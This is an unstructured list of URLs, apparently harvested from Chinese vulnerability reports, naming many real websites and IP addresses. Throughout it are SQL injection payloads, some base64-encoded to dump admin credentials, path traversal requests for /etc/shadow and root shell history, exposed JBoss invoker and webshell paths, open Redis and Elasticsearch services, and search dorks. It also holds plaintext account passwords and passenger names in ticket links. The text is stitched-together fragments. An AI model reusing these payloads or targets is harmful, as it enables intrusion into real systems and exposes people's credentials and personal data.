http://img4.imgtn.bdimg.com/it/u=574793251,2088439437&fm=21&gp=0.jpg http://dsp.cig.com.cn http://bind.17500.cn/?c=find http://182.254.151.41/ http://cos.sto.cn/login/Login.jsp?logintype=1 http://www.taojuan.cn:8181/ShopGoods/view/mall_find.do?spcid=P05&resourceTypeId=1 http://my.its.csu.edu.cn/MyInformation/MyPasswordModify_2/****(学工号) http://gefco.cae.com.cn:443/Default.aspx http://www.codoon.com/backend/gorup http://www.homelinkhr.com/view_getPostInfoForCustomer.action?id=150 http://www.yintai-centre.com/ http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=MjM= http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=MjMn http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNiw3LDgsOQ== 
http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNixjb25jYXQodXNlcigpLEBAZGF0YWRpcixkYXRhYmFzZSgpLHZlcnNpb24oKSksOCw5 http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNixncm91cF9jb25jYXQoZGlzdGluY3QgdGFibGVfbmFtZSksOCw5ICBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0weDY4NjQ2RDMwMzUzNzMwMzQzMTM1NUY2NDYy http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNixncm91cF9jb25jYXQoZGlzdGluY3QgY29sdW1uX25hbWUpLDgsOSAgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPTB4NjE2NDZENjk2RQ== http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNixjb25jYXQodXNlcm5hbWUscGFzc3dkKSw4LDkgIGZyb20gYWRtaW4= http://union.lashou.com/?r=setting%2Fbank%2Fzhaoshangcities http://61.129.89.187:8080/manager/authmgr/login.jsp http://pm.chaoxing.com/ http://pm.chaoxing.com/projects http://218.244.150.173:15672/ http://121.40.106.215:15672/ http://www.bxfgj.gov.cn/webbargainbx/presellbuild.aspx?buildcode=10088 http://218.89.108.173:8080/presellbuild.aspx?buildcode=12924016621001 http://58.59.112.106/presellbuild.aspx?buildcode=13146875771001 http://www.lysfgj.com:81/presellbuild.aspx?buildcode=13505442591005 http://www.jxfgj.com:8081/presellbuild.aspx?buildcode=12184229631001 http://www.bzfcj.gov.cn:9090/presellbuild.aspx?buildcode=13383658521213 http://www.lsfcj.com/presellbuild.aspx?buildcode=120150211000100001 http://gpsfcgls.com/presellbuild.aspx?buildcode=14199918731003 http://bind.17500.cn/admin.php?a=login&c=Login userId:M2191644 userId:M2191572 http://ie.yy.com/theme/themeCenter.html http://211.95.79.237:8080/ http://club.show.sina.com.cn http://club.show.sina.com.cn/viewthread.php?tid=633737 http://rw.baidu.com/ http://whjtj.gov.cn/loginjson/login.action http://61.49.38.101:8080 http://hd.221.gov.cn http://124.165.223.210:8080 http://61.189.223.215:8080 
http://211.144.105.113:8080 http://59.44.131.38:8080 http://218.25.115.4:8080 http://218.90.141.238:8080 http://218.80.224.36:8080 http://61.163.86.141:8080 http://115.182.54.239:8080 http://218.80.236.38:8080 http://1.207.62.209:8080 http://58.133.250.20:8080 http://58.221.250.57:8080 http://180.168.28.132:8080 http://219.137.166.79:8080 http://122.194.76.218:8080 http://119.44.222.238:8080 http://124.16.224.225:8080/invoker/JMXInvokerServlet http://112.124.23.240:8000/ http://112.124.4.196:8000/ http://www.charity.gov.cn/fsm/cms/site/cms_site_template_upload.jsp http://**.**.**/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspxFileID=1 http://112.124.23.240:28017/ http://115.28.222.146:28017/ redis_version:2.8.19 redis_git_sha1:00000000 redis_build_id:1ff65346083e56ee redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.8.2 run_id:8f7d473b215b652632d089ecdf9c2edbfd68494a tcp_port:6379 uptime_in_seconds:6891560 lru_clock:3866773 config_file:/etc/redis/redis.conf used_memory:1264104 used_memory_human:1.21M used_memory_rss:9080832 used_memory_peak:1794160 used_memory_peak_human:1.71M used_memory_lua:35840 mem_fragmentation_ratio:7.18 mem_allocator:jemalloc-3.6.0 rdb_last_save_time:1429928660 total_connections_received:4710 total_commands_processed:1510285 total_net_input_bytes:763576720 total_net_output_bytes:2741477552 instantaneous_input_kbps:0.00 instantaneous_output_kbps:0.00 expired_keys:141834 keyspace_hits:1139624 keyspace_misses:132713 latest_fork_usec:265 role:master repl_backlog_size:1048576 used_cpu_sys:6367.73 used_cpu_user:3874.02 used_cpu_sys_children:17.20 used_cpu_user_children:8.99 db0:keys=248,expires=248,avg_ttl=661193005 db1:keys=4,expires=0,avg_ttl=0 db6:keys=1,expires=0,avg_ttl=0 db7:keys=4,expires=0,avg_ttl=0 http://202.99.19.194:8080/projectname/reglogins/entity/iczsupplyreginfo/index.do http://202.99.19.194:8080/projectname/reglogins/entity/iczsupplyreginfo/index.do 
jboss-4.0.4.GA/server/default/./deploy/jbossweb-tomcat55.sar/ROOT.war/ http://202.99.19.194:8080/projectname/reglogins/entity/iczsupplyreginfo/index.do jboss-4.0.4.GA/server/default/./deploy/jbossweb-tomcat55.sar/ROOT.war jboss-4.0.4.GA/bin jboss-4.0.4.GA/bin/run.jar:/web/jdk1.6.0_27/lib/tools.jar http://125.35.6.54/sfdaic/jsp/index1.jsp http://125.35.6.54/sfdaic/html/20150330102730083679721.jsp http://125.35.6.54/sfdaic/sys.jsp http://125.35.6.54/sfdaic/system.jsp http://125.35.6.54/sfdaic/sysinfo.jsp http://125.35.6.54/sfdaic/tools/userbox/lcx.jsp http://125.35.6.54/sfdaic/sys/import/import.jsp http://125.35.6.54/sfdaic/sys/import/importsubmit.jsp http://125.35.6.54/sfdaic/cms/web/upload.jsp http://125.35.6.54/sfdaic/site_template/maindemo/dbsql/fsm_cms2.sql http://114.80.98.69:80/games/account_safe?gid=41&tid=291 http://easemob.com) http://221.239.120.206/zlbpro/zlbPage/index_page_4.action http://www.yohobuy.com/home/user/memberinfo http://202.109.255.73:8080/redem/index1.jsf http://202.109.255.73:8080/jmx-console_hymake http://202.109.255.73:8080/invoker/JMXInvokerServlet http://www.ias.fudan.edu.cn/Circs/Default.aspx?Cid=298%27 http://www.ias.fudan.edu.cn/File.aspx?filepath=File.aspx http://www.ias.fudan.edu.cn/manage_ias/FCKeditor/editor/filemanager/connectors/test.html http://www.ias.fudan.edu.cn/userfiles/file/ok.asp/1%281%29.jpg http://www.physics.fudan.edu.cn/tps/sites/phygsu/newtest/editor/admin_uploadfile.asp?id=14&dir=../ http://www.urp.fudan.edu.cn:86/epstar/web/swms/mainframe/home/index.jsp http://www.urp.fudan.edu.cn:99/ http://www.ao.fudan.edu.cn/fudan/studentLogin!index.action http://www.icescjcx.fudan.edu.cn/ http://jxjd.fudan.edu.cn/JXJD/index.asp http://fdtch.fudan.edu.cn/ http://eb.fudan.edu.cn/fdu/login.aspx http://heartlab.fudan.edu.cn/login.jsp http://ecology.fudan.edu.cn/51eweb_sysadmin/Default.aspx http://www.library.fudan.edu.cn/home.action?method=foundPwd http://bkcms.fdsm.fudan.edu.cn/login.jsp 
http://www.library.fudan.edu.cn/login.action www.stuaff.fudan.edu.cn/index.aspx‎ www.fudan.edu.cn http://www.physics.fudan.edu.cn/ www.fdsm.fudan.edu.cn/ www.xwxy.fudan.edu.cn/ www.gsao.fudan.edu.cn https://mail.fudan.edu.cn/ www.econ.fudan.edu.cn www.urp.fudan.edu.cn www.fso.fudan.edu.cn/ www.cs.fudan.edu.cn iso.fudan.edu.cn/xuewei.htm www.law.fudan.edu.cn yjsxk.fudan.edu.cn/wsxk/ www.gs.fudan.edu.cn/ www.freshman.fudan.edu.cn www.fao.fudan.edu.cn/ www.fudan-forward.com www.fudan.org.cn/ www.fudan.hk http://it.fudan.edu.cn/ http://xk.fudan.edu.cn/xk/ www.fudan-wuxi.net/ www.fudan-edu.com www.fudan-alumni.org www.fudan-printer.com uricompare.com/www/ www.fudan-edu.com.cn http://bbs.jlc001.com/ http://bbs.jinlianchu.com/ https://s.bt.gg/#q=%E7%A0%94%E5%8F%91%E4%B8%8E%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A%E6%AD%A6%E6%B1%89%E5%BC%98%E6%99%BA%E7%A7%91%E6%8A%80%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8&newwindow=1&start=0 http://1.85.4.132:8000/ http://xiezi.foundertype.com/ http://xiezi.foundertype.com/MrWrite2SIM/xml/20150420192358.asp http://1.51.203.1:8000/show_sb.php?yid=407 http://180.153.28.120:8017/Default.aspx http://180.153.28.120:8017/List.aspx?TitleID=13 http://222.204.3.84/login.action http://222.204.3.65/ http://www.ilas.com.cn/ http://ilas.lib.hustwb.edu.cn:8088/BookRetrInfo.aspx?nRecno=125644&nType=1&strISBN=7-80164-778-5 http://sj.whsw.cn/BookRetrInfo.aspx?nRecno=26520&TABNAME=ILASBIBLIOS&DISP=Holding&strISBN=978-7-303-15324-4 http://219.140.64.135:8088/BookRetrInfo.aspx?nRecno=158547&nType=1&strISBN=7-5053-9731-1 http://210.34.212.78/phone/BookRetrInfo.aspx?nRecno=68077&TABNAME=ILASBIBLIOS&DISP=Holding&strISBN=978-7-5617-6071-0&nType=242 http://27.24.159.150:8088/BookRetrInfo.aspx?nRecno=5174&TABNAME=ILASBIBLIOS&DISP=Holding&strISBN=978-7-5671-0379-5&nType=242 inurl:http://www.ceair.com/server/ticket.html?tktNo= http://www.ceair.com/server/ticket.html?tktNo=7812182280777&paxName=%E5%85%B3%E5%88%A9%E8%90%8D&certify=p46a 
http://www.ceair.com/server/ticket.html?tktNo=781-2496119556&paxName=%E9%BB%84%E7%8E%BA&certify=7p347 http://www.ceair.com/server/ticket.html?tktNo=7812494402973&paxName=%E9%B2%81%E7%9D%BF&certify=ngpn www.ycbus.com/login.html http://sns.wasu.cn//zfq/zfqindex.aspx?id=1&rid=0.8573297215625644&type=getdetail http://wooyun.org/bugs/wooyun-2010-086216。这篇帖子,正巧也在审计KPPW,也就去看了用一下最新版对于爆出问题的修补方式。最新版为了防止该漏洞,添加了一个验证。 http://pmdx.crbcint.com:8088/portal/admin/login.action https://8.9fbank.com/bbs/ https://mail.shenma-inc.com/ http://wooyun.org/bugs/wooyun-2015-0100773于是抱着尝试的态度登陆成功了, http://kdd.xidian.edu.cn/ http://kdd.xidian.edu.cn:8082/ http://kdd.xidian.edu.cn:8082/computer/%28master%29/script http://www.up-real.com/Eabout.asp?id=2的: http://www.maplevisa.com/Eabout.asp?id=2的: http://www.elsonicsolar.com/eabout.asp?id=2的: http://www.up-real.com/Ebusiness.asp?id=10的 http://www.up-real.com/EDownload.asp?id=12的: http://www.caizhimofang.com/answer/answer?id=11 http://www.alijijinhui.org/index.php?id=1 http://www.alijijinhui.org/index.php?id=1 http://zone.wooyun.org/content/16772 http://www.alijijinhui.org/index.php?id=08Eunion http://www.alijijinhui.org/index.php?id=08Eunion http://www.alijijinhui.org/index.php?id=8E0union/*.1*/select http://www.alijijinhui.org/index.php?id=1 http://www.cae.com.cn/ http://www.now.cn/email/ demo:http://mail.now.cn/ http://mail.now.cn http://www.zt163.cn/newsshow.php?pid=1047 http://www.zt163.cn/newsshow.php?pid=1047 http://www.zt163.cn/newsshow.php?pid=1047 http://www.zt163.cn/newsshow.php?pid=1047 http://www.zt163.cn/manage/admin.php?C=member&M=login https://mail.173.com/ http://l0086ivs.cn/wapx.asp http://l0086ivs.cn/admin http://mail.meizu.com/ http://wooyun.org/bugs/wooyun-2010-074841 http://210.76.70.246/login/ http://bbs.z.admin5.com/home.php?mod=space&uid=189619 http://shenbao.py-axa.com/retrade/ http://118329329.cn/admin.action wap.beargoo.com.cn/detail.php?menid=1626&smallid=774 http://sqlmap.org 
http://hr.edu.xxt.cn/download/downloadExcel.jsp?excelName=.%2Fdownload%2FdownloadExcel.jsp&downloadId=1677 http://**.**.**/roomAction/getListForWebsite.action http://u.ctrip.com/union/LoginShow.aspx?backUrl=http%3A//u.ctrip.com/union/MyInfo/OrderOnRequest.aspx%3Ftype%3DFlight https://vpn.citic.com/ http://1.63.18.108:8015/index/main!queryById.action http://www.teacher.com.cn/,点击里面“教师社区”,跳到网址:http://c.teacher.com.cn/,进行登陆。 inurl:supplierManage/edit.do?supplierid= http://jc.cscec.com/gjc/buyer/supplier/supplierManage/edit.do?supplierid=29707ed65a6e444ca2fcd212246f3310&pagestate=queryAuditPage.do&tabid=baseinfo http://jc.cscec.com/gjc/buyer/supplier/supplierManage/edit.do?supplierid=7e2c972430bf4dcfa4455d30d2e84642&pagestate=queryAuditPage.do&tabid=baseinfo&objttype=1&suppemployeeid=null http://open.ctrip.com/login.aspx?ReturnUrl=%2FVacations%2FTicketSenicSpotSearch%2Ftabid%2F196%2Fctl%2FEdit%2Fmid%2F773%2FDefault.aspx%3FpopUp%3Dtrue http://ilife.homelink.com.cn/aigou/admin.php http://ilife.homelink.com.cn/aigou/admin.php http://www.yanxiu.com/login.html http://fms.camera360.com:8880/ http://fms.camera360.com:8880/phpmyadmin/index.php http://221.8.57.110/i-card/loginToJumpAction.action http://221.8.57.110/i-card/loginToJumpAction.action http://pay.game.renren.com/login?url=http%3A%2F%2Fpay.game.renren.com%2Fpay%3Fg%3Dms http://218.28.13.244:800/zyedu/login.action http://123.125.97.177:80/webportal/loginSp/userLogin.action http://help.10010.com/web/admin/system_manage.jsp http://hi.163.com/qn/?username=skur1314@163.com&password=skur520.&captcha=9xcbk&autologin=on&loginbtn=%B5%C7%C2%BC%D6%D0%A1%AD&lgwin=true http://hi.163.com/qn?username=fuyue19910924@163.com&password=fuyue37027&captcha=kaxee&loginbtn=%B5%C7%C2%BC%D6%D0%A1%AD http://1.202.249.237:8080/ http://1.202.249.237/WebOS/Login.aspx http://blog.english.ctrip.com/ http://blog.english.ctrip.com/wp-login.php http://zhongyi.ifeng.com/login.html member.feiniu.com/my_returns/chooseReturn_cancel/201504CO25012161 
member.feiniu.com/my_returns/chooseReturn_cancel/201504CO25****** http://124.165.216.39:8080/proposal/loginindex.action?user.s=1 http://www.sdwstj.org/webPage/i/oem/wsb/处存在弱口令 username:123 password:123456 http://capi.dianyadian.com/User/GetCustomerLoginSMS http://capi.dianyadian.com/OAuth/tokenNewVersion http://capi.dianyadian.com/Common/FGetUserAmountInfo http://capi.dianyadian.com/Order/FSubmitOrderDetails coding:utf8 http://zzawb.gov.cn/web.rar http://zzawb.gov.cn/admin2012 http://webtrade.ebscn.com/invoker/JMXInvokerServlet http://118.123.170.74:8082/login!pwd.action http://c41_wangpan.houdunphp.com/houduan/filemanager/index.php http://www.envsc.cn///admin/js/adminlogin.js泄露登录密码 http://cg.chaoxing.com https://m.wukonglicai.com http://person.shgjj.com/shgjjwxzjcx/wxzjcx/login.action www.mdsxy.com/product_show.asp?action=common&ID=385 http://222.186.19.195:2007/web/login.html http://**.**.**/web/jsp/index.action_ http://www.xplus.com/ http://e.myrb.net/www/index.php?mod=admin&con=user&act=view&username=1 http://news.xd56b.com/www/index.php?mod=admin&con=user&act=view&username=1 http://qk.zgsyb.com.cn/www/index.php?mod=admin&con=user&act=view&username=1 http://szrb.sz-news.com.cn/www/index.php?mod=admin&con=user&act=view&username=1 http://epaper.dongmanbao.com.cn/www/index.php?mod=admin&con=user&act=view&username=1 http://**.**.**/xiaofang/xiaofang/Consultation_list.do_ http://**.**.**/xiaofang/xiaofang/Consultation_goReply.do_ http://**.**.**/AskList.aspxkey=-1 http://202.98.155.106/DZJJNWZHZZ/getDetailedContent.action?contId=6081 http://**.**.**/portal/companArticle.doid=1185_ http://**.**.**/qsksyy/ywblcx.do处_ http://www.czgj.cn/ http://www.czgj.cn/data/mysql/数据库账号密码,这是最重要的,果不其然顺利下载 http://www.czgj.cn/data/mysql_error_trace.php爆路径 http://www.stockstar.com就是这个主站的接口,可以看到是没有做任何登陆防护机制的 http://www.samsoncn.com/ http://210.41.176.25/manage/updateTable.aspx http://www.xsdxbzk.com/manage/updateTable.aspx http://myxk.hznu.edu.cn/manage/updateTable.aspx 
http://www.ahstuxb.com//manage/updateTable.aspx http://jhau.paperopen.com/manage/updateTable.aspx http://www.nnrc.com.cn/resume/resume-show.php?id=60178 http://test.xdoa.cn:82/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://test.xdoa.cn/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://221.208.251.28/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://219.146.182.244:8000/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://218.106.144.212:8000/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://211.137.17.222/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://124.130.146.94:8080/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://122.156.212.26:81/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://61.189.154.189/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://60.22.137.82/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://58.247.127.126/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://58.222.9.3:8000/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://58.222.9.3:8000/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://58.18.167.227/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://27.154.63.250:81/pda/main.php?P=wooyun%df%5c%27or%201=1%23 http://www.viewgood.cn http://zhibo.jsedu.sh.cn/viewgood/webmedia/portal/pic_proxy.aspx?id=1&type=2 http://116.236.137.30//viewgood/webmedia/portal/pic_proxy.aspx?id=1&type=2 http://xtxx.am.jsedu.sh.cn/viewgood/webmedia/portal/pic_proxy.aspx?id=1&type=2 http://61.155.83.162:88/viewgood/webmedia/portal/pic_proxy.aspx?id=1&type=2 http://61.132.41.91/viewgood/webmedia/portal/pic_proxy.aspx?id=1&type=2 http://www.imooc.com/user/resetpasspage?active=ODMxNjY4N0BxcS5jb20sMTQzMDAyNDA0OAuuid=MTkwMTExMg==&linkid=NDI4MjQw http://www.imooc.com/user/resetpasspage?active=邮箱,1430024048&uuid=1901112&linkid=428240 http://www.imooc.com/user/resetpasspage?active=MTA3NjkwODQ3N0BxcS5jb20sMTQzMDAyOTA1MA%3D%3D&uuid=MTkwMjMzMQ==&linkid=NDI4NDAy www.guerrillamail.com注册2个账户 ip:122.112.16.13存在redis未授权访问。因为没有网站所以没getshell http://www.ouc-edu.com/zxdt2.asp?id=170 
http://www.xiaoyuer.com/ http://www.hnkj.com.cn/ http://ahxcly.gov.cn/main/model/childcatalog/liuyanban.jsp?page=3&sql_where= http://www.ajaz.cn/main/model/childcatalog/liuyanban.jsp?page=3&sql_where= http://www.ahodc.com/main/model/childcatalog/liuyanban.jsp?page=2&sql_where= http://www.ahluqiao.com/main/model/childcatalog/liuyanban.jsp?page=3&sql_where= http://www.acegdc.com/main/model/childcatalog/liuyanban.jsp?page=1&sql_where= http://www.piaoyou.org/ http://demo.piaoyou.org/ http://www.yeehang.cc/ http://zw.jiritong.com/ http://sl.4000211929.com/ http://sdn.4000211929.com/ http://oa.wuzhouair.com/ http://oa.yccas.com/ http://oa.starstrip.net/ http://oa.ryxtrip.com/ http://oa.wuzhouair.com/PiaoYou_root.aspx http://demo.piaoyou.org/PiaoYou_root.aspx http://www.yeehang.cc//PiaoYou_root.aspx http://zw.jiritong.com/PiaoYou_root.aspx http://oa.ryxtrip.com/PiaoYou_root.aspx http://bu.foundertech.com/founderit/CN/ProductDetail.aspx?Type=IT&ID=104 http://tech.weibo.com/wp-admin/plugins.php http://www.gzredcross.org.cn/redbbs/admindefault.asp https://github.com/companyService/crawler_code/blob/70a9663c70d091814d675a388c4585acdeac40cd/company_service/settings.py https://101.69.217.162 http://es-hz.tcl.com存在一个sql注入漏洞。该网站的数据是access的,注入是属于布尔型盲注,可被脱裤。 http://www.caizhimofang.com/Home/Index/findpwdPhone www.guerrillamail.com注册2个账户 http://www.bcrj.com.cn/ http://202.196.33.227:8080/opac_two/serials/s_right.jsp?class_no=O http://219.144.130.220:38080/opac_two/serials/s_right.jsp?class_no=A http://202.200.87.32:1080/opac_two/serials/s_right.jsp?class_no=A http://218.107.191.111:9080/opac_two/serials/s_right.jsp?class_no=P http://opac.zzti.edu.cn:8080/opac_two/serials/s_right.jsp?class_no=A http://baozoumanhua.com/login http://www.liepin.com/user/lpt/ http://video2.duxiu.com//userinfo.asp?u=longzi http://video2.duxiu.com//userinfo.asp?u=renyiyonghu http://183.203.9.12:8080/XinoAMTY/index.jsp http://183.203.9.12:8080/XinoAMTY/login_user.action 
http://183.203.9.12:8080/XinoAMTY/login_user.action jboss-4.2.1.GA/server/default/./deploy/XinoAMTY.war jboss-4.2.1.GA/bin http://183.203.9.12:8080/XinoAMTY/login_user.action jboss-4.2.1.GA/server/default/./deploy/XinoAMTY.war/ http://tiwen.gdhsfz.xuexi365.com/paper2fav/morePaperL http://sqlmap.org http://www.zlinfo.com.cn/login.action http://218.6.249.93:83/tdjsb/html/2014-12/27/node_1.htm http://subscribe.chinadaily.com.cn/subReceiptQuery/select.action http://www.banyou.com http://www.banyou.com/user/alipayvip.asp http://www.zjs.com.cn/IntegalAdmin/UserManage.aspx http://www.zjs.com.cn/WS_Business/reg.aspx?Id=5 http://www.zjs.com.cn/WS_Business/WS_CustomLogin.aspx http://www.zjs.com.cn/IntegalAdmin/Default.aspx http://udc.weibo.com/wp-admin/ http://sbooking.ctrip.com/ http://apps.wandoujia.com/apps/com.ctrip.selectmerchants?pos=w/tag/%E9%85%92%E5%BA%97 http://travel.chinadaily.com.cn/events/events-list?m=2016-03 http://travel.chinadaily.com.cn/index/info/iid/* http://admin.colorful.cn/Common/ShowImages.ashx http://sqlmap.org http://www.js808.cn/newSite/Other/verifypwd.aspx?ucode=test&uemail=test@126.com http://118.122.80.201:8088/ http://cop.chanjet.com http://61.139.105.105:8008/IMRoleServlet?pt=del&rolecode=1 http://124.128.96.98:8001/IMUnitServlet?pt=add&org_code=1 http://www.mafengwo.cn/u/90104036.html http://180.168.201.42:8080/c3tidms/dms/login.action http://180.168.201.42:8080/c3tidms/dms/login.action http://180.168.201.42:8080/c3tidms/dms/login.action http://admin.houtai.xunzai.com/login.php http://gl.law.ruc.edu.cn/www.zip http://42.62.14.38:9200/_status http://42.62.14.38:9200/_cluster/health http://42.62.14.38:9200/_nodes http://42.62.14.38:9200/_search?pretty http://42.62.14.38:9200/wooyun/test/1 http://42.62.14.38:9200/wooyun-test curlhttp://42.62.14.38:9200/wooyun/test/_search?pretty http://42.62.14.38:9200/wooyun http://union.lashou.com http://www.byxwlzx.com/ http://jjjc.sqxz.gov.cn/ jjjc.sqxz.gov.cn/manager.do http://jjjc.sqxz.gov.cn/showUGB.do 
http://www.tlsp.net/showUGB.do http://www.yjxzfw.com.cn/showUGB.do http://218.201.232.67:8080/showUGB.do http://www.sinanxzfw.gov.cn/showUGB.do http://112.124.0.240:8000/ http://open.21ic.com//.svn/entries http://rszp.cqu.edu.cn/zpsys/index.jsp http://rczp.zafu.edu.cn/zpsys/index.jsp http://rszp.gdufs.edu.cn/zpsys/index.jsp http://rszp.scuec.edu.cn/zpsys/index.jsp http://rczp.zafu.edu.cn/zpsys/index.jsp http://rszp.gdufs.edu.cn/zpsys/index.jsp http://rszp.njupt.edu.cn/zpsys/index.jsp http://rszp.wfu.edu.cn/zpsys/index.jsp http://zp.xjau.edu.cn/zpsys/index.jsp http://hr.aufe.edu.cn/zpsys/index.jsp http://www.hnzzjob.com/Jobs.aspx?zwid=000000007137 http://jianzhan.hnzzjob.com/ http://co-diovan.medlive.cn/?c=index&city=1&m=academic http://co-diovan.medlive.cn/?m=academic&c=video&id=30 http://co-diovan.medlive.cn/?c=video&id=11&m=academic inurl:ecdomain http://www.lntour.gov.cn/ http://www.dggjj.cn/ http://jdzd.daqing.gov.cn/ http://gaj.daqing.gov.cn/ http://www.gdcourts.gov.cn/ http://www.jsnt.lss.gov.cn/ http://www.handanshebao.com.cn/ http://www.jhwsj.gov.cn/ http://www.asjy.gov.cn/ http://www.lnpj.hrss.gov.cn/ http://www.jlsgjj.cn/ http://www.ccfdw.gov.cn/ http://www.gslz.lss.gov.cn/ http://cygjj.gov.cn/ http://www.jlyb.lss.gov.cn/ http://www.lulong.gov.cn/ http://www.tqyb.cc/ http://www.lnbxhrss.gov.cn/ http://www.tj.lss.gov.cn/ http://www.jsnt.lss.gov.cn/ http://jlyb.lss.gov.cn/ http://www.cygjj.gov.cn/ http://**.**.**/nxwzga.rar_ http://t.cn/**** http://**.**.**/lygaj.rar http://dic.medlive.cn/common/ajax.inc.php http://cesu.shangdu.com/这个平台存在svn源代码泄露,可遍历浏览整个网站的源代码。 http://www.nccz.gov.cn https://s.bt.gg/#q=%E7%A0%94%E5%8F%91%E4%B8%8E%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A%E6%AD%A6%E6%B1%89%E5%BC%98%E6%99%BA%E7%A7%91%E6%8A%80%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8&newwindow=1&start=0 http://www.tmfdc.gov.cn/Web_Site/Search.aspx?type=0&keyword='and%20@@version=0-- http://www.xgfdc.com.cn/Web_Site/Search.aspx?type=0&keyword='and%20@@version=0-- 
http://www.gyfcj.com/Web_Site/Search.aspx?type=0&keyword='and%20@@version=0-- http://www.hxfdc.gov.cn/Web_Site/Search.aspx?type=0&keyword='and%20@@version=0-- http://www.sxczxzjj.com/Web_Site/Search.aspx?type=0&keyword='and%20@@version=0-- http://www.jlxfdc.com/Web_Site/Search.aspx?type=0&keyword='and%20@@version=0-- http://www.yxfgs.net/Web_Site/Search.aspx?type=0&keyword= http://www.xtsfdc.com/Web_Site/Search.aspx?type=0&keyword= http://www.zsxfdc.com/Web_Site/Search.aspx?type=0&keyword= http://sxqyxzjj.com/Web_Site/Search.aspx?type=0&keyword= http://www.yczfj.com/Web_Site/Search.aspx?type=0&keyword= http://ypfdc.cn/Web_Site/Search.aspx?type=0&keyword= http://www.fxfcj.com/Web_Site/Search.aspx?type=0&keyword= http://42.62.25.197/../../../../../../../../../../../../../../../../../etc/hosts http://42.62.25.196/../../../../../../../../../../../../../../../../../etc/hosts http://42.62.25.197/../../../../../../../../../../../../../../../../../etc/shadow http://42.62.25.196/../../../../../../../../../../../../../../../../../root/.bash_history rtmp://pull.showself.com/ rtmp://pull.showself.com/ about:blank http://**.**.** http://**.**.**/invoker/JMXInvokerServlet_ http://**.**.**/sws/index.sws http://zkbm.gyzkzx.com/CodeMang/CountyCodeTab_Add.php http://110.80.10.170:8081/jmx-console/ http://110.80.10.170:8081/oa/notneedlogin/checkusercodelevel.jsp?userid=admin http://110.80.10.170:8081/zmeu/cs.jsp http://110.80.10.170:8081/zecmd/zecmd.jsp http://www.swupl.edu.cn/guanli http://www.swupl.edu.cn/guanli/cpseditor/editor/filemanage/download.asp?filename=./../../guanli/cpseditor/editor/filemanage/download.asp http://cms.kisdee.com/yp/product.php?prowhere=1 http://temp.auto.163.com:8087/ http://i.medlive.cn http://chana-mazda.dma.cig.com.cn/lms_api/stat/get_stat_product_list?start_time=20150309&end_time=20150409&page_size=6&graph_type=histogram&1428532005517 http://www.cits.cn/marketing/APP/2wm/index.html http://wooyun.org/bugs/wooyun-2010-0107690 
http://wutongyu.info/iliebao.htm http://182.18.5.16:8080/people/cap/cap-login.htm http://171.8.76.134:8080/admin-console http://121.41.87.36:8080/ jdbc:mysql://123.103.61.153:3306 jdbc:mysql://123.103.21.189:3306 jdbc:mysql://wstvwzsj.mysql.rds.aliyuncs.com:3306 jdbc:mysql://hlwltrds.mysql.rds.aliyuncs.com:3306 www.dycredit.gov.cn http://113.57.156.14:91/pm/sys/Login_dologin.action http://www.taoke.com/ucenter.php?item=index&action=message&utype=all&job=viewsub&subid=236221 URL:support1.lenovo.com.cn http://support1.lenovo.com.cn:80/lenovo/wsi/index.html http://202.104.120.130/ http://202.104.120.130:85/ http://central.dlhis.com/index.php?r=Hawt/default/main>_id=1 http://central.dlhis.com/index.php?r=Hawt/default/main>_id=1 http://central.dlhis.com/inde.php http://www.dlhis.com/news_show.asp?news_id=23 http://workorder.fabao.cn:925/secure/Signup!default.jspa http://training.sobey.com/ http://training.sobey.com/phpMyAdmin http://blz.medlive.cn http://hotel.cits.cn/hotel/detail/35.html?city_id= http://www.sees.ynu.edu.cn/manage/Login.aspx http://wooyun.org/bugs/wooyun-2015-0105516。其中有一个分站地址是http://tj.fruitday.com/。感觉很简陋的样子,登陆的时候万能密码绕过。 http://www.chinasofti.com/ http://www.jxfx.agri.gov.cn/ExtendForm/Down/Technological.aspx?id=1 http://www.bjfs.agri.gov.cn/ExtendForm/Down/Technological.aspx?id=1 http://fxagri.gov.cn/ExtendForm/Down/Technological.aspx?id=1 http://www.zfagri.gov.cn/ExtendForm/Down/Technological.aspx?id=1 http://www.sczgagri.gov.cn/ExtendForm/Down/Technological.aspx?id=1 http://school.yinliancn.com http://school.yinliancn.com http://mail.51greenorange.com/ http://210.22.154.138:8003/ http://210.22.154.138:8003/dede http://oa.cnhxcc.com.cn/zhhxpm/sys/Login_dologin.action http://ticket.cits.cn/dest/cpw-tBJA.html http://ticket.cits.cn/dest/cpw-tBJA-p1.html 